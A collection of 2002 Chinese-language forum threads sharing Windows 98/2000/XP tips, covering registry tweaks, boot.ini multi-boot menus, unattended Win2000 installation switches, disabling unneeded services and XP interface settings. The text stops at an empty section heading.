    HungAppTimeout，是指一个应用程序出错时试图等待响应的时间，值为毫秒，缺省值为5000毫秒(即5秒)，可以减少为3000毫秒，以加快系统的响应能力。

    MenuShowDelay，是指“开始”菜单中当鼠标指向一个具有下级菜单的菜单项时等待出现下级菜单的延迟时间，单位也是毫秒，可以设成100，即等0.1秒就出现。

    ScreenSaveActive，指现在屏幕保护功能是否可用，值为0或1，0即为不用屏幕保护功能，1为可用。

    ScreenSaveTimeOut，指屏幕保护的延时，值为一数值。单位是秒，最小值是60秒。

    ScreenSaveUsePassword，指屏幕保护是否使用密码，值为0或1，0即不设密码，1为使用预设的密码。

    WaitToKillAppTimeout，是指当用Crtl_Alt_Del出现“关闭程序”对话框来关闭一个应用程序时出现提示“结束任务”、“等待”时选择“等待”的等待时间，单位是毫秒，默认值是10000。可以减小等待时间。

    25. 修改Windows的系统设置

    打开“我的电脑HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVesion\”，你会看到一些子文件夹，这里就是当前的一些系统设置，让我们来看一些文件夹：

    RUN文件夹，当Windows启动时，我们会发现有一些程序一启动便开始运行，但是在菜单“开始““程序““启动“中却找不到，这是为什么呢?，哦，原来都放在这个文件夹下面了，如果要想不让某个程序在启动时自动执行，只要将在Run文件夹下面的相应项目删除即可。

    各种输入法文件夹，如“全拼“文件夹，其下有一些关于全拼输入法的设置，其中，<Enter>表示是否用“回车“键代表取消错误的输入。一般值为0，而95版的“五笔字型“4.0版中则为1，经常让人感到非常厌烦，敲回车键在输入文章时却不是换行，只要此处改成0即可。“插空格“是指输入的每个汉字之间是否加一个空格，默认值是0，指不插空格，当我们要写HTML中文文档或者在某些英文软件中输入汉字时就需要汉字之间加空格，那么就在此将0变成1即可。

    打开“我的电脑\HKEY_LOCALMA CHINE\Software\Microsoft\ Windows\CurrentVersion\”在此文件夹下有很多项目和子文件夹，现在先看一下右边窗口的项目.

    ①ProductKey就是安装Windows/windows 98时的注册码。

    ②在我们安装很多微软公司的软件和其他一些软件时会发现系统已经默认了一个用户和用户单位，这个默认值是在安装Windows/98时输入的，如果想要修改这个用户设置只要更改右边的RegisteredOwner和Registered Organization的值。值的类型是字符串。

    ③在此文件夹下也有Run子文件夹，功能与前面提到的功能1中的Run功能相同，也是用来在系统启动时运行一些程序，对于不需要启动运行的程序可以删除。

    ④RunServices子文件夹，这些文件夹内的项目是指当将windows/98作为服务来运行的程序，这些程序也是在开机启动时作为服务来运行的，如微软的Persional Web Server、Wingate等小型服务器软件。一般不必去动它们，以免不必要的麻烦。

    有的计算机的Windows98关机特别慢，在选择完“关闭计算机“后会等上好几分钟才关机，打开“我的电脑\HKEY_LOCAL_MACHINE\System\ CourrentControlSet\ Control\ Shutdown“，在文件夹下创建一个名为FastReboot的字符串键，输入键值为1，你就可以享受快速关机了。

    26. 锁定桌面

    桌面设置包括诸如壁纸、图标以及快捷方式，一般都是我们经过精心选择才设定好的。大多数情况下，我们不希望他人随意修改桌面设置或随意删除快捷方式。怎么办?注册表可以帮你锁定桌面，这里“锁定”的含义是对他们的修改不做储存，不管别人怎么改，只要你重新启动一下计算机，你的设置就会原封不动地出现在你面前。)运行regedit，进入Hkey_Users\.default\Software\Microsoft\Windows\Current Version\Policies\Explorer；双击“NoSaveSetting”，并将其键值从0改为1。上面的修改是把计算机上所有用户的桌面设置全部锁定了，如果你只想锁定你自己的桌面，而不理会别人的是否被修改，可以在下面的路径中执行相同的操作：Hkey_Current_User\Software\Microsoft\Windows\Current Version\Policies\Explorer。

    27. 移走“关闭系统“菜单项

    有些时候，也许我们并不希望别人随意地关闭或重新启动我们的电脑，尤其对于商用的计算机，这一点十分重要。从开始菜单中把“关闭系统“一项移除，可以起到一定的保护作用：运行regedit打开注册表，进入Hkey_Users\.default\Software\Microsoft\Windows\CurrentVersion\ Policies\ Explorer；双击“No Close“，将键值从0改为1。此时你会发现开始菜单中“关闭计算机“选项已经不见了，试着使用Ctrl＋Alt＋Del来热启动一下，你会发现屏幕上出现的关闭菜单是虚的，无法使用。修改以后，要想关机，或者将此值改回0，或者关闭计算机的电源开关。

    28. 防止菜单随鼠标移动

    把鼠标指向下拉菜单的标题稍作停留，菜单会自动滚出。有时候，这个功能也会有“副作用“--在鼠标移动过程中，稍不留意按一下左键，就可能启动一个你并不需要的窗口。如果对此存反感情绪，可以使用注册表关闭这项功能.

    (1)、打开注册表，进入Hkey－Current－Use\Control Pannel\Desktop.

    (2)添加一个键名. “Menu Show Delay”；

    (3)输入键值. “65534”；

    (4)确认后重新启动计算机。

    如果想对所有用户生效，可以在下面目录中执行相同操作；

    Hkey_Users\.default\Control Pannel\desktop。

    29. 控制窗口的缩放

    如果想使Windows应用程序的窗口固定，即不可以缩小，打开注册表，进入Hkey－Current－User\Control Pannel\Desktop\Windows Metries；双击键名MinAnimate，将其值修改为“0”，则窗口不能缩小；如果改回“1”，窗口可以缩小。

    30. 去掉IE地址栏中的内容

    在HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs把不要的地址删掉就可以。

[这消息被啸编辑过(编辑时间2002-06-14 12:11:38)]

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

kmdesign

终级用户
积分：806
发帖：463
来自：新疆·武汉
注册：2001-12-02
 发表于 2002-06-14 15:40:33 按此观看kmdesign的个人资料 按此发邮件给kmdesign kmdesign 的 oicq 是6169277,查看 6169277 的资料 发送悄悄话给kmdesign 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kmdesign的IP
好东西，收了

就为你那被雨淋湿的花裙子
我给你一个一生的诺言
上一贴 | 下一贴
快速回复 主题：Windows注册表应用的30个实例
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


解密Win2000启动选单 - 经 典 论 坛

计算机技术
解密Win2000启动选单

上一贴 | 下一贴
发表人 主题: 解密Win2000启动选单
啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-05-29 21:25:24 按此观看啸的个人资料 按此发邮件给啸 收藏该主题供以后查看 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
讲解的很清楚的一篇文章，推荐一看：

引自： http://www.0663.net/class/soft/pingtai/ping13.htm

    不少朋友在自己的爱机上同时安装了Win 98和Win 2000。一般是先安装Win 98后再装Win 2000，在安装完成后再启动计算机就会出现多系统启动选单用以选择不同的操作系统。

    多系统启动选单产生的原理及运行机制
    要产生多系统启动选单有一个前提：在安装时两个操作系统必须安装在不同的磁盘分区中，并且是全新安装而不能是升级安装。

    ◆情况一：

    先将Win 98安装到C盘后，再在D盘全新安装Win 2000 Pro时，Win 2000的安装程序会在C盘根目录下产生一个名为Bootsect.dos的文件，并将C盘Win 98的引导程序移动到这个文件中，然后在C盘的引导区放入Win 2000自己的引导程序，同时在C盘根目录下还会产生Boot.ini、Bootfont.bin、Ntdetect.com、Ntldr等文件，这五个文件其属性均为系统（S）和隐藏（H）。此后计算机启动时先运行Win 2000的引导程序，该程序会依次调用Ntldr和Ntdetect.com，接下来读取Boot.ini的内容并根据Bootfont.bin指定的字体在屏幕上显示多系统的选择选单。如果用户不进行选择，那么计算机会在Boot.ini中指定的时间之后自动运行默认的操作系统，即启动安装在D盘上的Win 2000操作系统；如果用户选择Win 2000操作系统，那么启动过程与用户不进行选择时是一样的，只是启动时间上稍有差别而已；如果用户选择Win 98操作系统，那么计算机就会通过Bootsect.dos来启动安装在C盘上的Win 98。

    ◆情况二：

    如果用户是在C盘安装Win 2000后再在D盘安装Win 98，那么也会产生多系统启动选单，其原理及运行机制与以上所述内容相似。

    ◆理解Boot.ini文件：

    上述Boot.ini文件其实是一个标准的文本文件，用记事本就可以将其打开，其中内容共六行，分别为：

    ⑴[boot loader] “系统引导节”的标志。

    ⑵timeout=30 指定等待时间，可以直接将其中的数字改为所需的时间，如果改为数字“0”则表示不等待而直接启动默认的操作系统，此时与没有安装多系统时的启动情况相似。

    ⑶default=multi(0)disk(0)rdisk(0)partition(2)WINNT 指定默认的启动系统，这里用了“第一物理磁盘的第二分区下的WINNT目录”的方式来指明Win 2000的安装位置，若将“=”后的内容改为“C:”则默认启动系统就改为Win 98。

    ⑷[operating systems] “多系统选单节”的标志。

    ⑸C:="Microsoft Windows" 在“多系统选单”中显示Win 98并指明其安装后的启动位置。
⑹multi(0)disk(0)rdisk(0)partition(2)WINNT="Microsoft Windows 2000 Professional" / fastdetect 在“多系统选单”中显示Win 2000并指明其安装后的启动位置。

    应用实例
    ◆实例一：

    使用Windows的朋友都知道：Win 98的稳定性不太好，在使用过程中隔三差五地重装Win 98是家常便饭。现在两个操作系统并存，在重新安装Win 98时，如果是未将C盘格式化而直接选择覆盖安装，那么在安装完成后重新启动计算机时并不会出现多重启动选单。是不是就无法再启动Win 2000了呢？多重启动选单又是不是丢失了？其实不然，在C盘安装Win 98、D盘安装Win 2000的情况下，只要在Ｃ盘根目录下找到Ｂｏｏｔ．ｉｎｉ并编辑它，将其中的默认启动系统改为“default=multi o disk o rdisk o partition 2WINNT”后存盘退出，重新启动计算机，此时多重启动选单又出现了。其实，这种方法能起作用必须有一个前提条件：C盘根目录下的Boot.ini、Bootfont．bin、Bootsect.dos、Ntdetect.com、Ntldr五个文件以及能启动多系统选单的主引导程序必须存在且完好无损。因此，在上述情况和先安装Win 2000后再安装Win 98（在不同分区）的情况下，以上五个文件仍然在C盘根目录下存在而且主引导程序正常，因此按上述方法就可以简单恢复多系统启动选单，否则的话就行不通。

    ◆实例二：

    基于这一道理，如果是C盘安装Win 98而其它盘安装Win 2000的情况，那么在使用过程中重新安装Win 98时，通常为了“干净”起见而将C盘格式化后再进行安装。此时，为了在安装Win 98后仍然能够使用Win 2000的多系统启动选单，可以在格式化C盘并安装完Win 98后，运行Win 2000的安装程序WinNT进行全新安装并在计算机第一次重新启动时选择启动Win 98（切记！否则就会继续安装Win 2000而把原有Win 2000覆盖掉），进入Win 98后将C盘根目录下的$WIN_NT$.~BT（文件夹）、$DRVLTR$~_~、$LDR$以及D盘根目录下的以$开始的临时文件全部删除。此时编辑Boot.ini会发现，其中的内容变化为：

    [boot loader]

    timeout=5

    Default=C:$WIN_NT$.~BTBOOTSECT.DAT

    [Operating systems]

    multi(0)disk(0)rdisk(0)partition(2)WINNT="Microsoft Windows 2000 Professional" /fastdetect

    C:$WIN_NT$.~BTBOOTSECT.DAT="Microsoft Windows 2000 Professional 安装程序"

    C:="Microsoft Windows"

    其中内容有变化的行用于Win 2000的进一步安装，只要将其改为与前面所述内容相同的Boot.ini，之后重新启动计算机就会出现多系统启动选单。

    由此可以引申出另一快速恢复多系统启动选单的方法：就是利用Ghost克隆工具，全新安装完成后在Win 98或纯DOS状态下先将Win 98和Win 2000的系统区（最好是FAT文件系统而不是NTFS）分别生成一个镜像文件（GHO），千万记得先将系统“减肥”后再进行。此后随时可以方便地进行系统恢复，而且恢复后多重启动选单将完好无损。

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

上一贴 | 下一贴
快速回复 主题：解密Win2000启动选单
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

经典论坛 PS版与艺设版 联合举办 『设计四连击』 设计接龙


实现Win2000自动安装 - 经 典 论 坛

计算机技术
实现Win2000自动安装

上一贴 | 下一贴
发表人 主题: 实现Win2000自动安装
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-25 23:07:03 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 收藏该主题供以后查看 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
Win2000的自动安装需要一个名为setupmgr.exe的程序,你可以从win2000 cd-rom\support\tools\deploy.cab中得到.这是一个向导,双击启动,点下一步,选择“创建新的应答文件",下一步,选择”Win2000无人参与安装",下一步,选择安装平台,下一步.选择“全部自动",下一步,然后填写一些安装过程中提示问题的答案,最后保存时一定要以"winnt.sif"的文件名保存在一张空白软盘上,然后你就可以从CD-ROM执行安装,安装向导会自动寻找到"winnt.sif"的文件,就可以进行自动安装了.
注意:一定要取消CMOS里面的SYSTEM PASSWORD

此方法同样可以用于XP的自动安装.

::古落根门::

唯有不断学习 才能不断进步

kirsten9

终级用户
积分：532
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-01-25 23:27:14 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
win2k无人安装指南！^_^

在无人参与模式下运行安装程序
    通过使用应答文件 (answer file)，网络管理员和经验丰富的用户可以在无人参与
安装模式下执行新安装。在无人参与安装模式下，安装并不需要用户的干预，因为应答
文件含有安装所需的所有信息，包括接受许可协议、计算机名和网络适配器等。应答文
件可帮助您在多台计算机上快速安装 Windows 2000。
    Windows 2000 Professional 光盘的 I386 文件夹中包含一个应答文件示例 -- Un
attend.txt。使用此文件作为模板，可以创建自己的应答文件来自定义安装。
    要在 Windows 95、Windows 98、Windows NT 3.51 或 Windows NT 4.0 下运行无人
参与安装程序，可通过使用 /unattend[num]:[answer_file] 选项或 /unattend 选项启
动 Winnt32.exe 文件。
    下面介绍了一些用于自定义安装程序的参数和开关选项。
Winnt32.exe 命令语法
    运行 Winnt32.exe 可以安装或升级 Windows 2000，可以在 Windows 95、Windows
98 或 Windows NT 的命令提示符下运行 Winnt32 命令。
Winnt32 命令的语法如下：
winnt32 [/s:sourcepath] [/tempdrive:drive_letter]
[[/unattend[num]:[answer_file]] [/copydir:folder_name]
[[/copysource:folder_name] [/cmd:command_line]
[[/debug[level]:[filename]] [/udf:id[,UDF_file]]
[[/syspart:drive_letter] [/checkupgradeonly]
[[/cmdcons] [/m:folder_name] [makelocalsource]
[[/noreboot]
其中：
sourcepath
    指定 Windows 2000 源文件的位置。要想同时从多个服务器复制文件，应指定多个
/s 源。如果使用了多个 /s 开关选项，指定的第一个服务器必须可用，否则将安装失
败。
/tempdrive:drive_letter
    为安装程序指示存储临时文件的指定驱动器，并在该驱动器上安装 Windows 2000。

/unattend
    在无人参与安装模式下升级以前版本的 Windows 2000、Windows NT 4.0、Windows
NT 3.51、Windows 95 或 WIndows 98。因为所有用户设置都可以从上一次安装中获得
，所以在安装过程中并不需要用户干预。使用 /unattend 开关选项自动安装时，已肯定
您阅读过并接受 Windows 2000 的 Microsoft 许可协议。在代表组织而不是您个人使用
此开关选项安装 Windows 2000 时，必须确认最终用户（无论是个人还是团体）都已收
到、阅读并接受 Windows 2000 Microsoft 许可协议的条款。OEM 在销售给最终用户的
机器上可能不会指定此值。
/unattend[num]:[answer_file]
    在无人参与安装模式下执行干净安装。应答文件为安装程序提供了您自定义的一些
规范。Num 是在安装程序结束复制这些文件与重新启动计算机之间间隔的秒数。可以在
任何运行 Windows NT 或 Windows 2000 的计算机上使用 num 参数。Answer_file 是该
应答文件的文件名。
/copydir:folder_name
    在安装 Windows 2000 文件的文件夹内创建一个附加的文件夹。例如，如果源文件
夹含有一个称作 Private_drivers 的文件夹，该文件夹含有仅对您所做的修改信息，这
时键入 /copydir:Private_drivers 可让安装程序将该文件夹复制到安装 Windows 200
0 的文件夹中。这时新文件夹的位置将为 C:\Winnt\Private_drivers。还可以使用 /c
opydir 命令创建任意多个其他的文件夹。
/copysource:folder_name
    在安装 Windows 2000 文件的文件夹内创建一个临时附加文件夹。例如，源文件夹
中含有一个称作 Private_drivers 的文件夹，该文件夹含有仅对您所做的修改信息，这
时键入 /copysource:Private_drivers 可让安装程序将该文件夹复制到安装 Windows
2000 的文件夹中，以便在安装过程中使用其中的文件。这时临时文件夹的位置将为 C:
\Winnt\Private_drivers。与 /copydir 创建的文件夹不同，/copysource 创建的文件
夹在安装完成后即被删除。
/cmd:command_line
    指示安装程序在执行最后阶段的安装前，运行一个特殊的命令。这个命令会出现在
已两次重新启动计算机，且安装程序已收集完必要的配置信息，但安装还没有完成的时
候。
/debug[level]:[filename]
    在指定的级别上创建调试日志，例如 /debug4:C:\Win2000.log。默认的日志文件是
C:\%windir%\Winnt32.log，其调试级别为 2。日志级别表示如下：0 -- 严重错误、1
-- 错误、2 -- 警告、3 -- 通知、4 -- 用于调试的详细信息。每个级别都在其下包括
一些子级别。
/udf:id[,UDF_file]
    标明一个标识符 (id) ，该标识符 被安装程序用来指定唯一数据库文件 (UDF) 如
何修改应答文件（参见 /unattend 输入项）。UDF 会覆盖应答文件中的一些值，且标识
符会决定使用 UDF 中的哪些值。例如，/udf:RAS_user,Our_company.udb 会覆盖Our_c
ompany.udb 文件中为 RAS_user 标识符指定的一些设置。如果没有指定 UDF_file，安
装程序会提示用户插入一张含有 $Unique$.udb 文件的磁盘。
/syspart:drive_letter
    表明可以将安装启动文件复制到一个硬盘上，并将硬盘标记为活动，然后将该磁盘
安装到其他计算机上。当启动计算机时，该硬盘会自动启动下一阶段的安装。但必须始
终同时使用 /tempdrive 参数和 /syspart 参数。
/checkupgradeonly
    检查升级的计算机是否与 Windows 2000 兼容。对于从 Windows 95 或 Windows 9
8 升级，安装程序会在 Windows 安装文件夹内创建一个名为 Upgrade.txt 的报告。对
于从 Windows NT 3.51 或 4.0 升级，安装程序将把报告保存到安装文件夹的 Winnt32
.log 文件中。
/cmdcons
    为操作系统选择屏幕添加一个“故障恢复控制台”选项，以便修复失败的安装。此
命令只适用于安装后期。
/m:folder_name

    指定安装程序可以从候选位置复制替换文件，并指示安装程序要首先在候选位置查
找，如果这些文件存在，则用这些文件替换来自默认位置的文件。
/makelocalsource
    指示安装程序将所有的安装源文件复制到本地硬盘上。当采用从光盘安装时，使用
/makelocalsource 可以在以后没有光盘的情况下，为计算机提供安装文件。
/noreboot
    指示安装程序在完成 Winnt32 的文件复制阶段后不重新启动计算机，以便可以执行
其他的命令。

[这消息被kirsten9编辑过(编辑时间2002-01-25 23:27:38)]

{ KUka ALl wAYs wITh yOU }
上一贴 | 下一贴
快速回复 主题：实现Win2000自动安装
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


Win2000/XP可以禁用的服务 - 经 典 论 坛

dreamweaver MX 功能探索

计算机技术
Win2000/XP可以禁用的服务

上一贴 | 下一贴
发表人 主题: Win2000/XP可以禁用的服务
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-25 23:01:08 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 收藏该主题供以后查看 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
Win2000/XP Pro对于个人用户来说，有些服务可以取消，这样可以加快win2000运行的速度.你可以从"控制面板>管理工具>服务"里面禁

用这些服务:
Computer Browser
COM+ Event System
Distributed Link Tracking Client
Routing and Remote Access
IPSEC Services
Task Scheduler
Removable Storage
Remote Registry Service
Print Spooler(注:需要打印的用户不能禁用此项)

::古落根门::

唯有不断学习 才能不断进步

kirsten9

终级用户
积分：532
发帖：174
来自：冷冷的山脊
注册：2001-07-13
 发表于 2002-01-25 23:17:03 按此观看kirsten9的个人资料 该用户不允许显示它的电子邮件 访问kirsten9的主页 kirsten9 的 oicq 是18348795,查看 18348795 的资料 发送悄悄话给kirsten9 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看kirsten9的IP
有些服务是Windows XP所必需的，不能关闭，否则将会造成系统崩溃。至于各项服务的
功能，我们可以通过双击该服务或将鼠标悬停在该服务名上查看。下面我们就先来看一看这
些服务的说明，最后再看哪些服务可以关掉(见下表)。

alerter
你未连上局域网并且不需要管理警报

clipbook
你不需要查看远程剪贴簿的剪贴页面

distributed link tracking client
若不使用ntfs分区并且没有联入局域网

distributed transaction coordinator
不需要同时处理多个数据库或者文件系统

fax service
不用windows 2000发送或者接收传真

ftp publishing service
你的计算机不做ftp服务器

iis admin service
你的计算机不做www服务器

indexing service
你的计算机不提供远程文件索引和快速访问或者没有连上局域网

internet connection sharing
你不准备用windows 2000做路由服务器，让多人共享一条线路上网

ipsec policy agent
你未连接到windows 2000的域

logical disk manager administrative service
你不准备使用磁盘配额

message queuing
你未连接到windows 2000的域

messenger
你未连接到windows 2000的域并且不需要管理警报

net logon
你不想让局域网上的其他用户登录

netmeeting remote desktop sharing
你不想使用netmeeting远程管理计算机

network dde
你没有连入局域网

network dde dsdm
你没有连入局域网

performance logs and alerts
若不想知道计算机每一秒都干什么

qos rsvp
你没有使用依赖于qos的程序

remote access auto connection manager
你不想在程序企图读取网络信息时自动连接到网络

remote procedure call (rpc) locator
你不需要管理rpc名称服务数据库

routing and remote access
你的计算机不做路由器

runas service
你不需要在某一用户下以另外一个用户的身份执行一个程序

simple mail transport protocol (smtp)
你的计算机不做邮件发送服务器

smart card
你没有智能卡阅读器

smart card helper
你没有旧式智能卡阅读器

snmp trap service
你没有连接到windows 2000的域

tcp/ip netbios helper service
你的计算机不准备让别人共享

tcp/ip print server
不让你的计算机成为网络打印服务器

telnet
不想远程控制计算机执行控制台命令

uninterruptible power supply
没使用ups或ups不支持双向传输信号

utility manager
不从一个窗口中启动和配置辅助工具

windows management instrumentation
你不看你的系统管理信息

world wide web publishing service
你的计算机不做www服务器

忽忽~~~完啦~~~ ^_^

{ KUka ALl wAYs wITh yOU }
ImHow

怎样
积分：2446
发帖：648
来自：::HowHome::
注册：2002-01-16
 发表于 2002-01-25 23:35:51 按此观看ImHow的个人资料 按此发邮件给ImHow 访问ImHow的主页 ImHow 的 oicq 是16407971,查看 16407971 的资料 发送悄悄话给ImHow 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ImHow的IP
这些服务默认是启动的，只不过是pro版嘛，对个人用户来说是浪费了

::古落根门::

唯有不断学习 才能不断进步

上一贴 | 下一贴
快速回复 主题：Win2000/XP可以禁用的服务
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


Windows XP 设置（转贴） - 经 典 论 坛

计算机技术
Windows XP 设置（转贴）

上一贴 | 下一贴
发表人 主题: Windows XP 设置（转贴）
len

SlowHorse
积分：1198
发帖：572
来自：hebei
注册：2001-09-29
 发表于 2002-02-02 12:22:36 按此观看len的个人资料 按此发邮件给len 访问len的主页 len 的 oicq 是3248586,查看 3248586 的资料 收藏该主题供以后查看 发送悄悄话给len 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看len的IP
动手之前，首先要确保以管理员的身份登录操作系统，因为普通用户身份下好些选项是无权使用的。接下来请激活清晰字体（ClearType），ClearType 能使桌面的文字看起来更加清晰易读 — 这对于手提电脑或液晶显示器用户尤其重要。
要激活 ClearType，请打开控制面板的显示属性，点击“Appearances（外观）”选项卡，然后点击“Effects...（效果）”按钮，就会弹出如下对话框（由于笔者用的是英文版，涉及到 Windows 界面的东东，下面均采用前面这样写出英文并括号中注明中文意思的方式）：

勾上“Use the following method to smooth edges of screen fonts...（用下列方法圆滑屏幕字体边缘）”并在下拉菜单中选择“ClearType（清晰字体）”，然后点击 OK（确定），Apply（应用）按钮。

一、自动关闭停止响应的程序

在关机的时候，有时会弹出讨厌的对话框，提醒某个程序仍在运行，是否结束任务。

或者在 Windows XP 操作系统中，这个设置可以使 Windows XP当诊测到某个应用程序已经停止相应时可以自动关闭它，而不需要进行麻烦的手工干预。想要实现这个功能，就请点击“开始”->“运行”输入“Regedit”打开注册表编辑器，找到：HKEY_CURRENT_USER\Control Panel\Desktop 分支，将 AutoEndTasks 的键值设置为 1 即可。
注：可能会找不到 AutoEndTasks 键值，如果是这样的话，自己建一个串值并把它改为这个名字，值设为 1 就可以了。

二、加快启动和减少故障恢复时间

如果你电脑中是 Windows 9x 与 Windows XP 共存，系统启动时显示操作系统列表时间很长。右键单击“我的电脑”->“属性”->“高级”，在“启动和故障恢复”中点击“设置”，可以设置显示操作系统列表的时间，单击“编辑”也可以手动编辑启动选项，将 TIME OUT＝30 改为 TIME OUT＝5 即可。

三、优化启动设置（适用于家用版及专业版）

1、“我的电脑”->“属性”->“高级”->“启动和故障修复”中，点“错误报告”，选择“禁用错误汇报”、“但在发生严重错误时通知我”；

2、去掉“将事件写入系统日志”、“发送管理警报”、“自动重新启动”选项；将“写入调试信息”设置为“无”；

3、点击“编辑”，在弹出记事本文件中：

[Operating Systems]
timeout=30　// 把缺省时间 30 秒改为 0 秒
multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP　Professional" /fastdetect　// 把缺省 fastdetect 改为 nodetect

注册表修改方法：“HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control”，SystemStartOptions 键值改为 NODETECT。

四、开始菜单

在 Windows XP 中，微软特别提供了一个极为实用的功能，那就是可以选择是否把默认浏览器以及默认邮件客户端永远显示在开始菜单上。但难道只能放这两种程序吗？错！任何程序都可以这么做，具体方法请看下面：

1、使用资源管理器或者我的电脑浏览你所想要放置在开始菜单的程序所在文件夹，例如腾讯公司的 QQ；

2、选中程序，并点击鼠标右键；

3、在弹出菜单中点击“附到开始菜单”；

4、然后打开开始菜单，右键点击 QQ 程序的快捷方式，选择“重命名”，为自己喜欢的程序取一个更为动听和好看的名字，当然你可以不重名：）

就这样，程序就已经添加到开始菜单左侧上方的永驻列表中，除非你将其删除，那么它将会一直存在下去。利用这种方法，你就可以在开始菜单左侧创建一个“我最喜爱的程序收藏夹”，其具体方法如下：

1、在任务栏空白处点击鼠标右键，然后在弹出菜单中选择“属性”；

2、点选“开始菜单”选项卡并选择“自定义……”；

3、在“程序”区域中将开始菜单上的程序数目调整为 0；

4、然后按照前面所述方法，将自己喜欢的程序挨个加入开始菜单中，这样你就拥有了一个属于自己的程序收藏夹。

如果想要将程序从开始菜单永驻列表移除的话，那么只要在列表中右键点击程序，然后在弹出菜单中选择“从开始菜单脱离”或者“从列表中删除”，那么就可以将其从列表中清除。

注意：此处只能添加程序或者程序的快捷方式，并不适用于文件和文件夹。

另一个简单的优化小把戏，就是把滑出菜单时的延迟去掉。修改这个，要用到注册表编辑器（点击“开始”->“运行”，然后敲入“regedit”回车）。要修改的键值在 HKEY_CURRENT_USER\Control Panel\Desktop。具体要修改的键名是 MenuShowDelay -- 只需把值改为 0 就得了。记住，要重新启动计算机后更改才生效。

五、系统时间显示

Windows XP 可以在任务栏除了显示系统时间之外，还能显示星期与日期，只要将任务栏拉高一点就可以了。方法是：将鼠标移到屏幕下边的任务栏的上边线位置，当鼠标指标变成双箭号时，按下左键，往上拖拉至两行高位置即可。系统托盘处即显示时间，日期及星期。

六、安全性

在 Windows XP 中设定某个文件或文件夹的访问权限。按以前 Windows NT 或者 Windows 2000 的操作方法，根本无法找到设置访问权限的“安全性”标签。

根据 Windows XP 预设状态，系统只允许用户进行简易档案共用方式，因此无法详细设定某个文件夹或文件的访问权限。要改变此状态，请按下面操作。

1、选择文件夹的菜单“工具”下的“文件夹选项”，在系统弹出的窗口选择“查看”标签。

2、将“高级设置”项目中的“在资源管理器文件夹列表中显示简单文件夹查看”前面的勾去掉。

3、按“确定”退出。这时，再按以前版本操作方法，即可看到“安全性”标签，进入该标签，便可设置详细的访问权限。

七、文件夹显示方式

看惯了以前 Windows 的文件夹显示方式，对 Windows XP 新增的预设并排大图标显示方式的确有点不习惯，只是浪费屏幕空间，请按如下方法更改其预设方式：

1、打开一文件夹，在文件空白处点鼠标右键，将鼠标移至快显菜单的“查看”，之后按自己的喜好在其子菜单中选择一项显示方式，如“详细资料”显示方式。

2、Windows XP 将该显示方式套用到当前文件夹。

3、选择该文件夹的菜单“工具”下的“文件夹选项”，在系统弹出的窗口选择“查看”标签。

4、按下“应用到所有文件夹”按钮，在之后弹出的确认框按“是”，系统将你前面套用的格式预设为以后全部文件夹的显示方式。

八、创建启动软盘

Windows XP 下创建启动软盘。插入软盘，然后在软盘驱动器的图标上点击右键，弹出菜单选择格式化，在格式化窗口里最下边选择创建 MS-DOS 启动盘即可。

九、IE 网络浏览器加速技巧

Windows XP 自带 Internet Explorer 6，有个小技巧，修改之后启动得飞快（在我的机子上，简直是瞬间启动）。有些朋友试过为“半条命”游戏建个快捷方式，用一定方法修改之后启动加快，这里也是同样原理。右键点击 Internet Explorer 快捷图标（如任务栏上的快捷启动栏中那个 IE 图标），打开图标属性之后在“Target（目标）”后面加上“-nohome”参数。

十、如何减少磁盘空间的浪费

